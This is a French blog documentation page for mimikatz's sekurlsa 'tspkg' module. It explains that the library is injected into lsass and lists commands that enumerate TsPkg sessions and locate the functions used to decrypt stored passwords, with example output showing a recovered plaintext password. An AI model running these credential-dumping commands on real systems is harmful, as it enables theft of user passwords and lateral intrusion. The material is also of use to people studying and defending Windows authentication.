sekurlsa :: tspkg

tspkg

Librairie de manipulation du provider TsPkg
Le premier « pass the pass » de sekurlsa

Ce provider n’est disponible que sur les version NT 6 ou XP sur lequel il aura été manuellement installé (http://blog.gentilkiwi.com/securite/pass-the-pass)

Avant d’utiliser les méthodes offertes, il convient d’avoir injecté la librairie sekurlsa dans le processus lsass : http://blog.gentilkiwi.com/mimikatz/librairies/sekurlsa

Méthodes offertes :

@ getTsPkg

Description : Énumère les sessions courantes du provider TsPkg
Arguments : n.a.
Article : http://blog.gentilkiwi.com/securite/pass-the-pass
Exemple : @getTsPkg

mimikatz # @getTsPkg

Authentification Id         : 0;543606
Package d'authentification  : NTLM
Utilisateur principal       : Gentil Kiwi
Domaine d'authentification  : vm-w7-ult-x
        tspkg :         waza1234/

@ getTsPkgFunctions

Description : Affiche les fonctions du provider TsPkg_0 nécessaires à la recherche des mots de passe
Arguments : n.a.
Exemple : @getTsPkgFunctions

mimikatz # @getTsPkgFunctions
** tspkg.dll/lsasrv.dll ** ; Statut recherche : OK :)

@TSCredTableLocateDefaultCreds = 000007FEFCFD13FC
@LsaUnprotectMemory            = 000007FEFD668950

Laisser un commentaire

Votre adresse de messagerie ne sera pas publiée. Les champs obligatoires sont indiqués avec *

Vous pouvez utiliser ces balises et attributs HTML : <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>